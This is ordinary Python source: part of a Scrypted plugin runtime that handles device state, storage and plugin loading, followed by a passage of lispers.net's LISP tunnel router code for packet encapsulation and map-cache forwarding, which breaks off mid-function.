class DeviceState(scrypted_python.scrypted_sdk.types.DeviceState):
def __init__(self, id: str, nativeId: str, systemManager: SystemManager, deviceManager: scrypted_python.scrypted_sdk.types.DeviceManager) -> None:
super().__init__()
self._id = id
self.nativeId = nativeId
self.deviceManager = deviceManager
self.systemManager = systemManager
def getScryptedProperty(self, property: str) -> Any:
if property == ScryptedInterfaceProperty.id.value:
return self._id
deviceState = self.systemManager.systemState.get(self._id, None)
if not deviceState:
print("missing id %s" % self._id)
return None
return deviceState.get(property, None)
def setScryptedProperty(self, property: str, value: Any):
if property == ScryptedInterfaceProperty.id.value:
raise Exception("id is read only")
if property == ScryptedInterfaceProperty.mixins.value:
raise Exception("mixins is read only")
if property == ScryptedInterfaceProperty.interfaces.value:
raise Exception(
"interfaces is a read only post-mixin computed property, use providedInterfaces")
now = int(time.time() * 1000)
self.systemManager.systemState[self._id][property] = {
"lastEventTime": now,
"stateTime": now,
"value": value
}
self.systemManager.api.setState(self.nativeId, property, value)
class DeviceStorage(Storage):
id: str
nativeId: str
storage: Mapping[str, str]
remote: PluginRemote
loop: AbstractEventLoop
def update_storage(self):
self.remote.api.setStorage(self.nativeId, self.storage)
def getItem(self, key: str) -> str:
return self.storage.get(key, None)
def setItem(self, key: str, value: str):
self.storage[key] = value
self.update_storage()
def removeItem(self, key: str):
self.storage.pop(key, None)
self.update_storage()
def getKeys(self) -> Set[str]:
return self.storage.keys()
def clear(self):
self.storage = {}
self.update_storage()
class DeviceManager(scrypted_python.scrypted_sdk.types.DeviceManager):
def __init__(self, nativeIds: Mapping[str, DeviceStorage], systemManager: SystemManager) -> None:
super().__init__()
self.nativeIds = nativeIds
self.systemManager = systemManager
def getDeviceState(self, nativeId: str) -> DeviceState:
id = self.nativeIds[nativeId].id
return DeviceState(id, nativeId, self.systemManager, self)
async def onDeviceEvent(self, nativeId: str, eventInterface: str, eventData: Any = None) -> None:
await self.systemManager.api.onDeviceEvent(nativeId, eventInterface, eventData)
async def onDevicesChanged(self, devices: DeviceManifest) -> None:
return await self.systemManager.api.onDevicesChanged(devices)
async def onDeviceDiscovered(self, devices: Device) -> str:
return await self.systemManager.api.onDeviceDiscovered(devices)
async def onDeviceRemoved(self, nativeId: str) -> None:
return await self.systemManager.api.onDeviceRemoved(nativeId)
async def onMixinEvent(self, id: str, mixinDevice: Any, eventInterface: str, eventData: Any) -> None:
return await self.systemManager.api.onMixinEvent(id, mixinDevice, eventInterface, eventData)
async def requestRestart(self) -> None:
return await self.systemManager.api.onMixinEvent(id)
def getDeviceStorage(self, nativeId: str = None) -> Storage:
return self.nativeIds.get(nativeId, None)
class BufferSerializer(rpc.RpcSerializer):
def serialize(self, value):
return base64.b64encode(value).decode('utf8')
def deserialize(self, value):
return base64.b64decode(value)
class PluginRemote:
systemState: Mapping[str, Mapping[str, SystemDeviceState]] = {}
nativeIds: Mapping[str, DeviceStorage] = {}
pluginId: str
mediaManager: MediaManager
loop: AbstractEventLoop
consoles: Mapping[str, Future[Tuple[StreamReader, StreamWriter]]] = {}
def __init__(self, api, pluginId, loop: AbstractEventLoop):
self.api = api
self.pluginId = pluginId
self.loop = loop
self.__dict__['__proxy_oneway_methods'] = [
'notify',
'updateDeviceState',
'setSystemState',
'ioEvent',
'setNativeId',
]
async def print_async(self, nativeId: str, *values: object, sep: Optional[str] = ' ',
end: Optional[str] = '\n',
flush: bool = False,):
consoleFuture = self.consoles.get(nativeId)
if not consoleFuture:
consoleFuture = Future()
self.consoles[nativeId] = consoleFuture
plugins = await self.api.getComponent('plugins')
port = await plugins.getRemoteServicePort(self.pluginId, 'console-writer')
connection = await asyncio.open_connection(port=port)
_, writer = connection
if not nativeId:
nid = 'undefined'
else:
nid = nativeId
nid += '\n'
writer.write(nid.encode('utf8'))
consoleFuture.set_result(connection)
_, writer = await consoleFuture
strio = StringIO()
print(*values, sep=sep, end=end, flush=flush, file=strio)
strio.seek(0)
b = strio.read().encode('utf8')
writer.write(b)
def print(self, nativeId: str, *values: object, sep: Optional[str] = ' ',
end: Optional[str] = '\n',
flush: bool = False,):
asyncio.run_coroutine_threadsafe(self.print_async(
nativeId, *values, sep=sep, end=end, flush=flush), self.loop)
async def loadZip(self, packageJson, zipData, options=None):
zipPath: str
if isinstance(zipData, str):
zipPath = (options and options.get('filename', None)) or zipData
if zipPath != zipData:
shutil.copyfile(zipData, zipPath)
else:
zipPath = options['filename']
f = open(zipPath, 'wb')
f.write(zipData)
f.close()
zipData = None
zip = zipfile.ZipFile(zipPath)
plugin_volume = os.environ.get('SCRYPTED_PLUGIN_VOLUME')
python_prefix = os.path.join(plugin_volume, 'python-%s-%s' % (platform.system(), platform.machine()))
if not os.path.exists(python_prefix):
os.makedirs(python_prefix)
python = 'python%s' % str(
sys.version_info[0])+"."+str(sys.version_info[1])
print('python:', python)
if 'requirements.txt' in zip.namelist():
requirements = zip.open('requirements.txt').read()
str_requirements = requirements.decode('utf8')
requirementstxt = os.path.join(python_prefix, 'requirements.txt')
installed_requirementstxt = os.path.join(
python_prefix, 'requirements.installed.txt')
need_pip = True
try:
existing = open(installed_requirementstxt).read()
need_pip = existing != str_requirements
except:
pass
if need_pip:
print('requirements.txt (outdated)')
print(str_requirements)
f = open(requirementstxt, 'wb')
f.write(requirements)
f.close()
p = subprocess.Popen([python, '-m', 'pip', 'install', '-r', requirementstxt,
'--prefix', python_prefix], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
line = p.stdout.readline()
if not line:
break
line = line.decode('utf8').rstrip('\r\n')
print(line)
result = p.wait()
print('pip install result %s' % result)
if result:
raise Exception('non-zero result from pip %s' % result)
f = open(installed_requirementstxt, 'wb')
f.write(requirements)
f.close()
else:
print('requirements.txt (up to date)')
print(str_requirements)
sys.path.insert(0, zipPath)
site_packages = os.path.join(
python_prefix, 'lib/%s/site-packages' % python)
sys.path.insert(0, site_packages)
from scrypted_sdk import sdk_init # type: ignore
self.systemManager = SystemManager(self.api, self.systemState)
self.deviceManager = DeviceManager(self.nativeIds, self.systemManager)
self.mediaManager = await self.api.getMediaManager()
sdk_init(zip, self, self.systemManager,
self.deviceManager, self.mediaManager)
from main import create_scrypted_plugin # type: ignore
return await rpc.maybe_await(create_scrypted_plugin())
async def setSystemState(self, state):
self.systemState = state
async def setNativeId(self, nativeId, id, storage):
if id:
ds = DeviceStorage()
ds.id = id
ds.nativeId = nativeId
ds.storage = storage
ds.remote = self
ds.loop = self.loop
self.nativeIds[nativeId] = ds
else:
self.nativeIds.pop(nativeId, None)
async def updateDeviceState(self, id, state):
if not state:
self.systemState.pop(id, None)
else:
self.systemState[id] = state
async def notify(self, id, eventTime, eventInterface, property, value, changed=False):
if property:
state = None
if self.systemState:
state = self.systemState.get(id, None)
if not state:
print('state not found for %s' % id)
return
state[property] = value
# systemManager.events.notify(id, eventTime, eventInterface, property, value.value, changed);
else:
# systemManager.events.notify(id, eventTime, eventInterface, property, value, changed);
pass
async def ioEvent(self, id, event, message=None):
pass
async def createDeviceState(self, id, setState):
pass
async def getServicePort(self, name):
pass
async def readLoop(loop, peer, reader):
async for line in reader:
try:
message = json.loads(line)
asyncio.run_coroutine_threadsafe(peer.handleMessage(message), loop)
except Exception as e:
print('read loop error', e)
sys.exit()
async def async_main(loop: AbstractEventLoop):
reader = await aiofiles.open(3, mode='r')
def send(message, reject=None):
jsonString = json.dumps(message)
try:
os.write(4, bytes(jsonString + '\n', 'utf8'))
except Exception as e:
if reject:
reject(e)
peer = rpc.RpcPeer(send)
peer.nameDeserializerMap['Buffer'] = BufferSerializer()
peer.constructorSerializerMap[bytes] = 'Buffer'
peer.constructorSerializerMap[bytearray] = 'Buffer'
peer.params['print'] = print
peer.params['getRemote'] = lambda api, pluginId: PluginRemote(
api, pluginId, loop)
async def get_update_stats():
update_stats = await peer.getParam('updateStats')
def stats_runner():
ptime = round(time.process_time() * 1000000)
heapTotal = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
stats = {
'type': 'stats',
'cpuUsage': {
'user': ptime,
'system': 0,
},
'memoryUsage': {
'heapTotal': heapTotal,
},
}
asyncio.run_coroutine_threadsafe(update_stats(stats), loop)
loop.call_later(10, stats_runner)
stats_runner()
asyncio.run_coroutine_threadsafe(get_update_stats(), loop)
await readLoop(loop, peer, reader)
def main():
loop = asyncio.new_event_loop()
def gc_runner():
gc.collect()
loop.call_later(10, gc_runner)
gc_runner()
loop.run_until_complete(async_main(loop))
loop.close()
if __name__ == "__main__":
worker = threading.Thread(target=main)
worker.start()
loop = GLib.MainLoop()
loop.run()
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_trace_listen_socket = None
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_threads = []
#
# In AWS, the source RLOC must be a private address or it will not outbound
# forward encapsulated packets. dmidecode MUST BE installed in the AWS VM
# so we can tell if lispers.net is running on AWS. And if a container is
# running on an AWS VM, dmidecode must be installed in the container. Do this
# by using "apt-get install dmidecode".
#
lisp_rtr_source_rloc = None
#
# Check if fast python data-plane should run.
#
lisp_rtr_fast_mode = (os.getenv("LISP_RTR_FAST_DATA_PLANE") != None)
lisp_rtr_latency_debug = (os.getenv("LISP_RTR_LATENCY_DEBUG") != None)
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
lisp_threads))
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads,
True))
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("RTR"))
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_glean_mapping_command
#
# Add a configured glean_mapping to the lisp_glean_mapping array.
#
def lisp_rtr_glean_mapping_command(kv_pair):
entry = { "rloc-probe" : False, "igmp-query" : False }
for kw in kv_pair.keys():
value = kv_pair[kw]
if (kw == "instance-id"):
v = value.split("-")
entry["instance-id"] = [0, 0]
if (len(v) == 1):
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[0])
else:
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[1])
#endif
#endif
if (kw == "eid-prefix"):
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_prefix(value)
entry["eid-prefix"] = eid
#endif
if (kw == "group-prefix"):
geid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geid.store_prefix(value)
entry["group-prefix"] = geid
#endif
if (kw == "rloc-prefix"):
rloc = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
rloc.store_prefix(value)
entry["rloc-prefix"] = rloc
#endif
if (kw == "rloc-probe"):
entry["rloc-probe"] = (value == "yes")
#endif
if (kw == "igmp-query"):
entry["igmp-query"] = (value == "yes")
#endif
#endfor
#
# Check if entry already exists. If so, just return.
#
for e in lisp.lisp_glean_mappings:
if (e.has_key("eid-prefix") ^ entry.has_key("eid-prefix")): continue
if (e.has_key("eid-prefix") and entry.has_key("eid-prefix")):
old = e["eid-prefix"]
new = entry["eid-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("group-prefix") ^ entry.has_key("group-prefix")):
continue
#endif
if (e.has_key("group-prefix") and entry.has_key("group-prefix")):
old = e["group-prefix"]
new = entry["group-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("rloc-prefix") ^ entry.has_key("rloc-prefix")): continue
if (e.has_key("rloc-prefix") and entry.has_key("rloc-prefix")):
old = e["rloc-prefix"]
new = entry["rloc-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("instance-id") ^ entry.has_key("instance-id")): continue
if (e.has_key("instance-id") and entry.has_key("instance-id")):
old = e["instance-id"]
new = entry["instance-id"]
if (old != new): continue
#endif
#
# Found a match. Do not append existing entry to array.
#
return
#endfor
#
# Add dictionary array to array.
#
lisp.lisp_glean_mappings.append(entry)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR"))
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
lisp_sockets, rloc, port, hostname = parms
addr = "{}:{}".format(rloc.print_address_no_iid(), port)
eid = lisp.green(mc.print_eid_tuple(), False)
msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
format(hostname, lisp.red(addr, False), eid, "{}", "{}")
for rloc_entry in mc.rloc_set:
if (rloc_entry.rle):
for rle_node in rloc_entry.rle.rle_nodes:
if (rle_node.rloc_name != hostname): continue
rle_node.store_translated_rloc(rloc, port)
old_addr = rle_node.address.print_address_no_iid() + ":" + \
str(rle_node.translated_port)
lisp.lprint(msg.format("RLE", old_addr))
#endfor
#endif
if (rloc_entry.rloc_name != hostname): continue
#
# Update lisp-crypto encap array. Put keys in new dictionary array
# location since translated address and port changed. We don't want
# to rekey because of a NAT change.
#
old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
str(rloc_entry.translated_port)
if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
#endif
#
# Update translated information with new information.
#
rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
rloc_entry.store_translated_rloc(rloc, port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
lisp.lprint(msg.format("RLOC", old_addr))
#
# Trigger RLOC-probe if enabled.
#
if (lisp.lisp_rloc_probing):
seid = None if (mc.group.is_null()) else mc.eid
deid = mc.eid if (mc.group.is_null()) else mc.group
lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
#endif
#endfor
#
# Write change to external data-plane.
#
lisp.lisp_write_ipc_map_cache(True, mc)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))
if (mc.source_cache == None): return(True, parms)
#
# There is (source, group) state so walk all sources for this group
# entry.
#
mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk,
[sockets, rloc, port, hostname])
return
#enddef
#
# lisp_fast_debug
#
# Print out debug for lisp_rtr_fast_data_plane().
#
def lisp_fast_debug(sred, packet):
if (lisp.lisp_data_plane_logging == False): return
if (sred in ["Send", "Receive"]):
p = binascii.hexlify(packet[0:20])
lisp.lprint("Fast-{}: ip {} {} {} {} {}".format(sred, p[0:8], p[8:16],
p[16:24], p[24:32], p[32:40]))
elif (sred in ["Encap", "Decap"]):
p = binascii.hexlify(packet[0:36])
lisp.lprint("Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}". \
format(sred, p[0:8], p[8:16], p[16:24], p[24:32], p[32:40],
p[40:48], p[48:56], p[56:64], p[64:72]))
#endif
#enddef
#
# lisp_fast_lookup_debug
#
# Print out lisp_rtr_fast_data_plane() lookup information.
#
def lisp_fast_lookup_debug(dest, mc):
if (lisp.lisp_data_plane_logging == False): return
hm = "miss" if mc == None else "hit!"
lisp.lprint("Fast-Lookup {} {}".format(dest.print_address(), hm))
#enddef
#
# lisp_latency_debug
#
# Set or print latency timing. Used by both lisp_rtr_data_plane() and lisp_
# rtr_fast_data_plane().
#
def lisp_latency_debug(ts, msg):
global lisp_rtr_latency_debug
if (lisp_rtr_latency_debug == False): return(None)
#
# Return the initial timestamp when requested.
#
if (ts == None): return(time.time())
#
# Compute elapsed time from initial timestamp.
#
ts = (time.time() - ts) * 1000000
lisp.lprint("{}-Latency: {} usecs".format(msg, round(ts, 1)), "force")
return(None)
#enddef
#
# lisp_fast_address_to_binary
#
# Convert 4-byte address from packet format to binary. Used to store in
# lisp_address.address for other support functions to be used.
#
def lisp_fast_address_to_binary(a):
binary = ord(a[0]) << 24 | ord(a[1]) << 16 | ord(a[2]) << 8 | ord(a[3])
return(binary)
#enddef
#
# lisp_rtr_fast_data_plane
#
# This is a python fast data plane that is limited in features and process
# packets in a raw manner. That is, there are no library calls and no byte
# swaps done. It is designed to make the gleaning RTR data-plane with LISP
# to non-LISP interworking go faster.
#
# Any non-fast operations returns False to allow lisp_rtr_data_plane() to
# process the packet normally.
#
# The first byte of 'packet' is assumed to be either the first byte of the
# LISP encapsulated packet (coming from an ITR) or a regular IP packet
# (arriving from a non-LISP source). All other packets (like LISP control-plane
# packets that can come in the form of both encapsulated or non encapsulated,
# return False, for lisp_rtr_data_plane() to process.
#
lisp_seid_cached = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
lisp_deid_cached = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
def lisp_rtr_fast_data_plane(packet):
global lisp_map_cache, lisp_raw_socket
ts = lisp_latency_debug(None, "Fast")
#
# Check if UDP ports for any type of LISP packet. Strict outer headers
# if LISP encapsulated packet.
#
iid = 0
srloc = None
if (packet[9] == '\x11'):
if (packet[20:22] == '\x10\xf6'): return(False)
if (packet[22:24] == '\x10\xf6'): return(False)
if (packet[20:22] == '\x10\xf5' or packet[22:24] == '\x10\xf5'):
srloc = packet[12:16]
iid = packet[32:35]
iid = ord(iid[0]) << 16 | ord(iid[1]) << 8 | ord(iid[2])
if (iid == 0xffffff): return(False)
lisp_fast_debug("Decap", packet)
packet = packet[36::]
#endif
#endif
lisp_fast_debug("Receive", packet)
#
# Get destination in a form for map_cache lookup.
#
dest = lisp_fast_address_to_binary(packet[16:20])
lisp_deid_cached.instance_id = iid
lisp_deid_cached.address = dest
#
# Don't switch multicast for now.
#
if ((dest & 0xe0000000) == 0xe0000000): return(False)
#
# Do map-cache lookup.
#
dest = lisp_deid_cached
mc = lisp.lisp_map_cache.lookup_cache(dest, False)
lisp_fast_lookup_debug(dest, mc)
if (mc == None): return(False)
#
# Check for source gleaning. If gleaned entry and RLOC changes from SRLOC
# return to do more general processing.
#
if (srloc != None):
src = lisp_fast_address_to_binary(packet[12:16])
lisp_seid_cached.instance_id = iid
lisp_seid_cached.address = src
src_mc = lisp.lisp_map_cache.lookup_cache(lisp_seid_cached, False)
if (src_mc == None):
allow, x, y = lisp.lisp_allow_gleaning(lisp_seid_cached, None,
None)
if (allow): return(False)
elif (src_mc.gleaned):
srloc = lisp_fast_address_to_binary(srloc)
if (src_mc.rloc_set[0].rloc.address != srloc): return(False)
#endif
#
# Cache source for map-cache display.
#
mc.add_recent_source(lisp_seid_cached)
#endif
#
# Need this check for interworking.
#
if (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION and
mc.eid.instance_id == 0):
dest.instance_id = lisp.lisp_default_secondary_iid
mc = lisp.lisp_map_cache.lookup_cache(dest, False)
lisp_fast_lookup_debug(dest, mc)
if (mc == None): return(False)
#endif
#
# Determine if new LISP encap is to be prepended or we are forwarding
# a decapsulated packet.
#
if (mc.action != lisp.LISP_NATIVE_FORWARD_ACTION):
if (mc.best_rloc_set == []): return(False)
dest = mc.best_rloc_set[0]
if (dest.state != lisp.LISP_RLOC_UP_STATE): return(False)
iid = mc.eid.instance_id
port = dest.translated_port
stats = dest.stats
dest = dest.rloc
drloc = dest.address
srloc = lisp.lisp_myrlocs[0].address
#
# Build outer IPv4 header.
#
outer = '\x45\x00'
length = len(packet) + 20 + 8 + 8
outer += chr((length >> 8) & 0xff) + chr(length & 0xff)
outer += '\xff\xff\x40\x00\x10\x11\x00\x00'
outer += chr((srloc >> 24) & 0xff)
outer += chr((srloc >> 16) & 0xff)
outer += chr((srloc >> 8) & 0xff)
outer += chr(srloc & 0xff)
outer += chr((drloc >> 24) & 0xff)
outer += chr((drloc >> 16) & 0xff)
outer += chr((drloc >> 8) & 0xff)
outer += chr(drloc & 0xff)
outer = lisp.lisp_ip_checksum(outer)
#
# Build UDP and LISP headers.
#
udplen = length - 20
udplisp = '\xff\x00' if (port == 4341) else '\x10\xf5'
udplisp += chr((port >> 8) & 0xff) + chr(port & 0xff)
udplisp += chr((udplen >> 8) & 0xff) + chr(udplen & 0xff) + '\x00\x00'
udplisp += '\x08\xdf\xdf\xdf'
udplisp += chr((iid >> 16) & 0xff)
udplisp += chr((iid >> 8) & 0xff)
udplisp += chr(iid & 0xff)
udplisp += '\x00'
#
# Append all outer headers.
#
packet = outer + udplisp + packet
lisp_fast_debug("Encap", packet)
else:
length = len(packet)
stats = mc.stats
lisp_fast_debug("Send", packet)
#endif
#
# Increment stats.
#
mc.last_refresh_time = time.time()
stats.increment(length)
#
# Send it.
#
dest = dest.print_address_no_iid()
lisp_raw_socket.sendto(packet, (dest, 0))
lisp_latency_debug(ts, "Fast")
return(True)
#endif
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_trace_listen_socket
global lisp_rtr_source_rloc
global lisp_rtr_fast_mode
ts = lisp_latency_debug(None, "RTR")
#
# Try switching packet fast.
#
if (lisp_rtr_fast_mode):
if (lisp_rtr_fast_data_plane(lisp_packet.packet)): return
#endif
#
# Feature-rich forwarding path.
#
packet = lisp_packet
is_lisp_packet = packet.is_lisp_packet(packet.packet)
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
if (is_lisp_packet == False):
orig_packet = packet.packet
pkt, source, port, ttl = lisp.lisp_is_rloc_probe(orig_packet, -1)
if (orig_packet != pkt):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
return
#endif
#endif
#
# First check if we are assembling IPv4 fragments.
#
packet.packet = lisp.lisp_reassemble(packet.packet)
if (packet.packet == None): return
#
# We need to cache the input encapsualted packet as well as the output
# encapsulated packet.
#
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#
# If we are a PITR as well, we are receiving non encapsulated packets
# via return packets from doing LISP-NAT. Print some useful header fields
# and strip outer headers. Strip outer headers if LISP encapsulated packet
# and start inner header forwarding logic.
#
if (is_lisp_packet):
if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return
packet.print_packet("Receive-({})".format(thread_name), True)
packet.strip_outer_headers()
else:
if (packet.decode(False, None, None) == None): return
packet.print_packet("Receive-({})".format(thread_name), False)
#endif
#
# If instance-id is 0xffffff, this is a Info-Request packet encapsulated
# to port 4341. We need to store the source port and source RLOC for
# NAT-traversal reasons.
#
# We don't need to send an Info-Reply from the 4341 data port. There is no
# information the xTR needs. It has the translated address from the
# map-server, and the NAT is ready for packets from port 4341 since we
# received this Info-Request.
#
if (is_lisp_packet and packet.lisp_header.get_instance_id() == 0xffffff):
header = lisp.lisp_control_header()
header.decode(packet.packet)
if (header.is_info_request()):
info = lisp.lisp_info()
info.decode(packet.packet)
info.print_info()
#
# Store/refresh NAT state and Fix map-cache entries if there was
# a change.
#
h = info.hostname if (info.hostname != None) else ""
s = packet.outer_source
p = packet.udp_sport
if (lisp.lisp_store_nat_info(h, s, p)):
lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
#endif
else:
source = packet.outer_source.print_address_no_iid()
ttl = packet.outer_ttl
packet = packet.packet
if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
packet = packet[28::]
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
#endif
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
if (is_lisp_packet):
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#endif
#
# Process inner header (checksum and decrement ttl).
#
igmp = None
if (packet.inner_dest.is_mac()):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Process decap node trace function.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
packet.outer_source.afi = lisp.LISP_AFI_NONE
packet.outer_dest.afi = lisp.LISP_AFI_NONE
#endif
#
# Should we glean source information from packet and add it to the
# map-cache??
#
allow, x, y = lisp.lisp_allow_gleaning(packet.inner_source, None,
packet.outer_source)
if (allow):
igmp_packet = packet.packet if (igmp) else None
lisp.lisp_glean_map_cache(packet.inner_source, packet.outer_source,
packet.udp_sport, igmp_packet)
if (igmp): return
#endif
#
# Is the destination gleaned which means we should suppress a mapping
# system lookup.
#
deid = packet.inner_dest
if (deid.is_multicast_address()):
if (deid.is_link_local_multicast()):
deid_str = lisp.green(deid.print_address(), False)
lisp.dprint("Drop link-local multicast EID {}".format(deid_str))
return
#endif
gleaned_dest = False
x, y, z = lisp.lisp_allow_gleaning(packet.inner_source, deid, None)
else:
gleaned_dest, x, y = lisp.lisp_allow_gleaning(deid, None, None)
#endif
packet.gleaned_dest = gleaned_dest
#
# Do map-cache lookup. If no entry found, send Map-Request.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
if (mc): mc.add_recent_source(packet.inner_source)
#
# Check if we are doing secondary-instance-ids only when we have a
# map-cache entry in the IID that is possibly a non-LISP site.
#
if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
mc.eid.address == 0)):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db and db.secondary_iid):
dest_eid = packet.inner_dest
dest_eid.instance_id = db.secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
if (mc):
packet.gleaned_dest = mc.gleaned
mc.add_recent_source(packet.inner_source)
else:
gleaned_dest, x, y = lisp.lisp_allow_gleaning(dest_eid, None,
None)
packet.gleaned_dest = gleaned_dest
#endif
#endif
#endif
#
# Map-cache lookup miss. Do not send Map-Request to mapping system if
# dest-EID is configured to be gleaned. We want to give preference to
# the gleaned mapping and not the mapping in the mapping system.
#
if (mc == None and gleaned_dest):
lisp.lprint("Suppress Map-Request for gleaned EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "map-cache miss"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.refresh()):
if (lisp.lisp_rate_limit_map_request(packet.inner_dest) == False):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.last_refresh_time = time.time()
mc.stats.increment(len(packet.packet))
#
# Encapsulate or native forward packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, None)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
